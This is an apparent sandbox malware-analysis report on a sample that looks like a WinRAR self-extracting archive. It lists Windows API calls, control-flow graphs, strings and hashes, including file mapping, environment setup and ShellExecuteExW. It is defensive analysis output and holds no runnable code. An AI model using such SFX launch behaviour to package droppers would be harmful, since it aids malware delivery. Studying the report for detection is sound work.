24593->24585 24595->24560 24596->24559 24597->24560 24598->24560 24599->24560 24600->24574 24601->24583 24602->24591 24603->24587 25307 fbe455 14 API calls ___delayLoadHelper2@8 25308 fba440 GdipCloneImage GdipAlloc 25359 fc3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25378 fd1f40 CloseHandle 25310 fca43a 11 API calls 25340 fbf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25380 fbff30 LocalFree 25141 fcbb30 25142 fcbb39 25141->25142 25143 fcbb42 25141->25143 25145 fcba27 25142->25145 25146 fc97e5 _abort 38 API calls 25145->25146 25147 fcba34 25146->25147 25165 fcbb4e 25147->25165 25149 fcba3c 25174 fcb7bb 25149->25174 25152 fcba53 25152->25143 25153 fc8e06 __vswprintf_c_l 21 API calls 25154 fcba64 25153->25154 25155 fcba96 25154->25155 25181 fcbbf0 25154->25181 25158 fc8dcc _free 20 API calls 25155->25158 25158->25152 25159 fcba91 25191 fc91a8 20 API calls _abort 25159->25191 25161 fcbada 25161->25155 25192 fcb691 26 API calls 25161->25192 25162 fcbaae 25162->25161 25163 fc8dcc _free 20 API calls 25162->25163 25163->25161 25166 fcbb5a __FrameHandler3::FrameUnwindToState 25165->25166 25167 fc97e5 _abort 38 API calls 25166->25167 25169 fcbb64 25167->25169 25170 fcbbe8 _abort 25169->25170 25173 fc8dcc _free 20 API calls 25169->25173 25193 fc8d24 38 API calls _abort 25169->25193 25194 fcac31 EnterCriticalSection 25169->25194 25195 fcbbdf LeaveCriticalSection _abort 25169->25195 25170->25149 25173->25169 25175 fc4636 __cftof 38 API calls 25174->25175 25176 fcb7cd 25175->25176 25177 fcb7dc GetOEMCP 25176->25177 25178 fcb7ee 25176->25178 25179 fcb805 25177->25179 25178->25179 25180 fcb7f3 GetACP 25178->25180 25179->25152 25179->25153 25180->25179 25182 fcb7bb 40 API calls 25181->25182 25183 fcbc0f 25182->25183 25186 fcbc60 IsValidCodePage 25183->25186 25188 fcbc16 25183->25188 25190 fcbc85 _abort 25183->25190 25184 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25185 fcba89 25184->25185 25185->25159 25185->25162 25187 fcbc72 GetCPInfo 25186->25187 25186->25188 25187->25188 25187->25190 25188->25184 25196 fcb893 GetCPInfo 25190->25196 25191->25155 25192->25155 25194->25169 25195->25169 25202 fcb8cd 25196->25202 25205 fcb977 25196->25205 25199 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25201 fcba23 25199->25201 25201->25188 25206 fcc988 25202->25206 25204 fcab78 __vswprintf_c_l 43 API calls 25204->25205 25205->25199 25207 fc4636 __cftof 38 API calls 25206->25207 25208 fcc9a8 MultiByteToWideChar 25207->25208 25210 fcca7e 25208->25210 25211 fcc9e6 25208->25211 25212 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25210->25212 25213 fc8e06 __vswprintf_c_l 21 API calls 25211->25213 25217 fcca07 _abort __vsnwprintf_l 25211->25217 25214 fcb92e 25212->25214 25213->25217 25220 fcab78 25214->25220 25215 fcca78 25225 fcabc3 20 API calls _free 25215->25225 25217->25215 25218 fcca4c MultiByteToWideChar 25217->25218 25218->25215 25219 fcca68 GetStringTypeW 25218->25219 25219->25215 25221 fc4636 __cftof 38 API calls 25220->25221 25222 fcab8b 25221->25222 25226 fca95b 25222->25226 25225->25210 25227 fca976 __vswprintf_c_l 25226->25227 25228 fca99c MultiByteToWideChar 25227->25228 25229 fca9c6 25228->25229 25238 fcab50 25228->25238 25231 fca9e7 __vsnwprintf_l 25229->25231 25233 fc8e06 __vswprintf_c_l 21 API calls 25229->25233 25230 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25232 fcab63 25230->25232 25234 fcaa30 MultiByteToWideChar 25231->25234 25249 fcaa9c 25231->25249 25232->25204 25233->25231 25235 fcaa49 25234->25235 25234->25249 25253 fcaf6c 25235->25253 25238->25230 25240 fcaaab 25244 fc8e06 __vswprintf_c_l 21 API calls 25240->25244 25245 fcaacc __vsnwprintf_l 25240->25245 25241 fcaa73 25242 fcaf6c __vswprintf_c_l 11 API calls 25241->25242 25241->25249 25242->25249 25243 fcab41 25261 fcabc3 20 API calls _free 25243->25261 25244->25245 25245->25243 25246 fcaf6c __vswprintf_c_l 11 API calls 25245->25246 25248 fcab20 25246->25248 25248->25243 25250 fcab2f WideCharToMultiByte 25248->25250 25262 fcabc3 20 API calls _free 25249->25262 25250->25243 25251 fcab6f 25250->25251 25263 fcabc3 20 API calls _free 25251->25263 25254 fcac98 _abort 5 API calls 25253->25254 25255 fcaf93 25254->25255 25258 fcaf9c 25255->25258 25264 fcaff4 10 API calls 3 library calls 25255->25264 25257 fcafdc LCMapStringW 25257->25258 25259 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25258->25259 25260 fcaa60 25259->25260 25260->25240 25260->25241 25260->25249 25261->25249 25262->25238 25263->25249 25264->25257 25312 fcc030 GetProcessHeap 25341 fcb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25360 fbc220 93 API calls _swprintf 25315 fcf421 21 API calls __vswprintf_c_l 25316 fa1025 29 API calls 25383 fa1710 86 API calls 25342 fbad10 73 API calls 25319 fba400 GdipDisposeImage GdipFree 25361 fbd600 70 API calls 25320 fc6000 QueryPerformanceFrequency QueryPerformanceCounter 25345 fc2900 6 API calls 4 library calls 25362 fcf200 51 API calls 25384 fca700 21 API calls

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00FB087C
                                                                                                                                                                                                • Part of subcall function 00FB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FB088E
                                                                                                                                                                                                • Part of subcall function 00FB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FB08BF
                                                                                                                                                                                                • Part of subcall function 00FBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FBA655
                                                                                                                                                                                                • Part of subcall function 00FBAC16: OleInitialize.OLE32(00000000), ref: 00FBAC2F
                                                                                                                                                                                                • Part of subcall function 00FBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FBAC66
                                                                                                                                                                                                • Part of subcall function 00FBAC16: SHGetMalloc.SHELL32(00FE8438), ref: 00FBAC70
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00FBDF5C
                                                                                                                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FBDF83
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FBDF94
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00FBDFCE
                                                                                                                                                                                                • Part of subcall function 00FBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FBDBF4
                                                                                                                                                                                                • Part of subcall function 00FBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FBDC30
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FBDFD7
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00FFEC90,00000800), ref: 00FBDFF2
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00FFEC90), ref: 00FBDFFE
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00FBE009
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBE048
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FBE05A
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00FBE061
                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00FBE078
                                                                                                                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00FBE0C9
                                                                                                                                                                                              • Sleep.KERNEL32(?), ref: 00FBE0F7
                                                                                                                                                                                              • DeleteObject.GDI32 ref: 00FBE130
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00FBE140
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00FBE183
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                              • API String ID: 3049964643-3743209390
                                                                                                                                                                                              • Opcode ID: 12243cc0d9e1d4e0484d855cb6a14325d85c4acc3b0d1c8982fb2d3c93fb0f18
                                                                                                                                                                                              • Instruction ID: 40ea8d3fc20de8ac01ff0aebde070c77ff1b6aa533e82ff031887cbcb819e4c9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12243cc0d9e1d4e0484d855cb6a14325d85c4acc3b0d1c8982fb2d3c93fb0f18
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C612471904349AFD320AB76EC49FBB77ADEF45740F04002AF605962A2DB78D944FB62

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 812 fba6c2-fba6df FindResourceW 813 fba7db 812->813 814 fba6e5-fba6f6 SizeofResource 812->814 815 fba7dd-fba7e1 813->815 814->813 816 fba6fc-fba70b LoadResource 814->816 816->813 817 fba711-fba71c LockResource 816->817 817->813 818 fba722-fba737 GlobalAlloc 817->818 819 fba73d-fba746 GlobalLock 818->819 820 fba7d3-fba7d9 818->820 821 fba7cc-fba7cd GlobalFree 819->821 822 fba74c-fba76a call fc0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 fba76c-fba78e call fba626 822->825 826 fba7c5-fba7c6 GlobalUnlock 822->826 825->826 831 fba790-fba798 825->831 826->821 832 fba79a-fba7ae GdipCreateHBITMAPFromBitmap 831->832 833 fba7b3-fba7c1 831->833 832->833 834 fba7b0 832->834 833->826 834->833
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6D5
                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6EC
                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA703
                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA712
                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FBB73D,00000066), ref: 00FBA72D
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00FBA73E
                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FBA762
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00FBA7C6
                                                                                                                                                                                                • Part of subcall function 00FBA626: GdipAlloc.GDIPLUS(00000010), ref: 00FBA62C
                                                                                                                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FBA7A7
                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00FBA7CD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                                              • String ID: PNG
                                                                                                                                                                                              • API String ID: 211097158-364855578
                                                                                                                                                                                              • Opcode ID: 52b8e467a7013d65a5f168b2a010086dae27ab8b93950d993d323d4c18c8c36f
                                                                                                                                                                                              • Instruction ID: 82bb2687432718ae8ca41c596fd03a5b6ed3e045ad3cab5bcfd07b0e757e5d88
                                                                                                                                                                                              • Opcode Fuzzy Hash: 52b8e467a7013d65a5f168b2a010086dae27ab8b93950d993d323d4c18c8c36f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7931A1B5A05306AFC7109F32DC89D5B7FBAFF84761B140519F94582621EF31D844EE62

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1029 faa69b-faa6bf call fbec50 1032 faa6c1-faa6ce FindFirstFileW 1029->1032 1033 faa727-faa730 FindNextFileW 1029->1033 1034 faa742-faa7ff call fb0602 call fac310 call fb15da * 3 1032->1034 1035 faa6d0-faa6e2 call fabb03 1032->1035 1033->1034 1036 faa732-faa740 GetLastError 1033->1036 1042 faa804-faa811 1034->1042 1044 faa6fe-faa707 GetLastError 1035->1044 1045 faa6e4-faa6fc FindFirstFileW 1035->1045 1038 faa719-faa722 1036->1038 1038->1042 1047 faa709-faa70c 1044->1047 1048 faa717 1044->1048 1045->1034 1045->1044 1047->1048 1050 faa70e-faa711 1047->1050 1048->1038 1050->1048 1052 faa713-faa715 1050->1052 1052->1038
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6C4
                                                                                                                                                                                                • Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27
                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6F2
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6FE
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA728
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA734
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 42610566-0
                                                                                                                                                                                              • Opcode ID: 55af0dc845231af1d157667081cd61ac33c2afdff881df283eff7eebc367f049
                                                                                                                                                                                              • Instruction ID: 760170c329ce31aa84acd5b240c0adf1158f7e69943e749574a9b028442355b7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 55af0dc845231af1d157667081cd61ac33c2afdff881df283eff7eebc367f049
                                                                                                                                                                                              • Instruction Fuzzy Hash: C241BFB2900119ABCB25DF68CC88AEAB7B8FF49350F044196E55DE3210D7346E94EF91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002,00000000), ref: 00FC7E0F
                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002,00000000), ref: 00FC7E16
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00FC7E28
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                              • Opcode ID: 7859043806396e6742b0dccedbd25da39ac2915971bdbf2a9bbe919ded2e2709
                                                                                                                                                                                              • Instruction ID: 2d2a51f7b44e932402d07f7623b7ab5338e1b77ca2e2c6a76434bb0d372c79e8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7859043806396e6742b0dccedbd25da39ac2915971bdbf2a9bbe919ded2e2709
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E04632401249ABCF017F20CE0EE4A3F6AEB00351F004459F909AA132CB3ADE92EA90
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: 01d2ed8cf8971631c15a02bf0d4ff84ddfe86e445a8dda738955567f2517f418
                                                                                                                                                                                              • Instruction ID: eb261c1d2ab73d87b6724624b7eec8c4811a01df9093d5ee37b06aced3ab410f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01d2ed8cf8971631c15a02bf0d4ff84ddfe86e445a8dda738955567f2517f418
                                                                                                                                                                                              • Instruction Fuzzy Hash: CC824DF1D04245AEDF15DF64C881BFABBB9BF07350F0840B9D8499B142CBB45A86EB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FBB7E5
                                                                                                                                                                                                • Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                                • Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBB8D1
                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB8EF
                                                                                                                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00FBB902
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00FBB910
                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00FBB91A
                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00FBB93D
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00FBB960
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00FBB983
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FBB99E
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00FD35F4), ref: 00FBB9B1
                                                                                                                                                                                                • Part of subcall function 00FBD453: _wcslen.LIBCMT ref: 00FBD47D
                                                                                                                                                                                              • SetFocus.USER32(00000000), ref: 00FBB9B8
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBBA24
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: GetDlgItem.USER32(00000068,00FFFCB8), ref: 00FBD4E8
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00FBAF07,00000001,?,?,00FBB7B9,00FD506C,00FFFCB8,00FFFCB8,00001000,00000000,00000000), ref: 00FBD510
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FBD51B
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FD35F4), ref: 00FBD529
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD53F
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FBD559
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD59D
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FBD5AB
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD5BA
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD5E1
                                                                                                                                                                                                • Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FD43F4), ref: 00FBD5F0
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FBBA68
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00FBBA90
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00FBBAAE
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBBAC2
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00FBBAF4
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00FBBB43
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBBB7C
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00FBBBD0
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00FBBBEA
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00FBBC47
                                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00FBBC6F
                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00FBBCB9
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00FBBCE2
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FBBCEB
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBBD1E
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBBD7D
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000065,00FD35F4), ref: 00FBBD94
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00FBBD9D
                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00FBBDAC
                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FBBDBB
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBBE68
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FBBEBE
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBBEE8
                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FBBF32
                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00FBBF4C
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00FBBF55
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00FBBF6B
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00FBBF85
                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,00FEA472), ref: 00FBBFA7
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00FBC007
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBC01A
                                                                                                                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00FBC0BD
                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00FBC197
                                                                                                                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00FBC1D9
                                                                                                                                                                                                • Part of subcall function 00FBC73F: __EH_prolog.LIBCMT ref: 00FBC744
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBC1FD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
